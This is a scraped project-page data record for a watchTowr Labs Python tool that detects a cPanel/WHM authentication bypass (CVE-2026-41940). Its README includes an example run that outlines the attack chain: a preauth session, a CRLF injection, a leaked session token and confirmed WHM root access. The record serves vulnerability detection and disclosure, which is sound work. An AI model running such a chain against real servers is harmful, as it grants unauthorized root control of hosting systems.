[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"project-1111":3},{"id":4,"name":5,"fullName":6,"owner":7,"repo":5,"description":8,"homepage":8,"htmlUrl":8,"language":9,"languages":8,"totalLinesOfCode":8,"stars":10,"forks":11,"watchers":12,"openIssues":13,"contributorsCount":13,"subscribersCount":13,"size":13,"stars1d":14,"stars7d":15,"stars30d":16,"stars90d":13,"forks30d":13,"starsTrendScore":17,"compositeScore":18,"rankGlobal":8,"rankLanguage":8,"license":8,"archived":19,"fork":19,"defaultBranch":20,"hasWiki":19,"hasPages":19,"topics":21,"createdAt":8,"pushedAt":8,"updatedAt":22,"readmeContent":23,"aiSummary":24,"trendingCount":13,"starSnapshotCount":13,"syncStatus":14,"lastSyncTime":25,"discoverSource":26},1111,"watchTowr-vs-cPanel-WHM-AuthBypass-to-RCE.py","watchtowrlabs\u002FwatchTowr-vs-cPanel-WHM-AuthBypass-to-RCE.py","watchtowrlabs",null,"Python",413,96,7,0,2,9,27,6,5.96,false,"main",[],"2026-06-12 02:00:23","# cve-2026-41940 cPanel\u002FWHM Authentication Bypass - Detection Artifact Generator\n\ncPanel\u002FWHM Authentication Bypass Detection Artifact Generator Tool\n\n\n# Description\n\n\nThis Detection Artifact Generator verifies if cPanel\u002FWHM is vulnerable to a [recent](https:\u002F\u002Fsupport.cpanel.net\u002Fhc\u002Fen-us\u002Farticles\u002F40073787579671-cPanel-WHM-Security-Update-04-28-2026) authentication bypass.\n\n# Detection in Action\n\nTest against a vulnerable instance:\n\n```\npython authbypass-RCE.py --target https:\u002F\u002Ftarget:2087\u002F \n                     __         ___  ___________\n         __  _  ______ _\u002F  |__ ____ |  |_\\__    ____\\____  _  ________\n         \\ \\\u002F \\\u002F \\__  \\    ___\u002F ___\\|  |  \\|    | \u002F  _ \\ \\\u002F \\\u002F \\_  __ \\\n          \\     \u002F \u002F __ \\|  | \\  \\___|   Y  |    |(  \u003C_> \\     \u002F |  | \\\u002F\n           \\\u002F\\_\u002F (____  |__|  \\___  |___|__|__  | \\__  \u002F \\\u002F\\_\u002F  |__|\n                          \\\u002F          \\\u002F     \\\u002F\n\n        watchTowr-vs-cPanel-WHM-AuthBypass-to-RCE.py\n\n        (*) cPanel\u002FWHM Authentication Bypass - Detection Artifact Generator\n\n          - Sina Kheirkhah (@SinSinology) of watchTowr (@watchTowrcyber)\n\n        CVEs: [CVE-2026-Pending]\n\n[0] hostname = \n[1] minting a preauth session...\n    session base = :vQ2WC5Bexp0oFSa7\n[2] sending the CRLF injection (Basic auth + no-ob cookie)...\n    HTTP 307, leaked token = \u002Fcpsess5691070609\n[3] firing do_token_denied to propagate raw -> cache...\n    HTTP 401, gadget fired\n[4] verifying we're WHM root...\n    \u002Fjson-api\u002Fversion -> HTTP 200  {\"version\":\"11.110.0.89\"}\n\n```\n\n\n# Affected Versions\n\nRefer to cPanel website [here](https:\u002F\u002Fsupport.cpanel.net\u002Fhc\u002Fen-us\u002Farticles\u002F40073787579671-cPanel-WHM-Security-Update-04-28-2026)\n\n# Follow [watchTowr](https:\u002F\u002FwatchTowr.com) Labs\n\nFor the latest security research follow the [watchTowr](https:\u002F\u002FwatchTowr.com) Labs Team \n\n- https:\u002F\u002Flabs.watchtowr.com\u002F\n\n- https:\u002F\u002Fx.com\u002Fwatchtowrcyber\n","该项目是一款用于检测cPanel\u002FWHM系统是否存在认证绕过漏洞的工具。其核心功能是生成检测工件，通过模拟攻击向量来验证目标系统是否受到CVE-2026-41940漏洞的影响。该工具采用Python编写，能够自动化执行从会话创建到漏洞利用的一系列步骤，并最终确认是否具有管理员权限。适用于网络安全人员或系统管理员在日常维护中对cPanel\u002FWHM服务器进行安全检查，确保及时发现并修复潜在的安全风险。","2026-06-11 02:41:40","CREATED_QUERY"]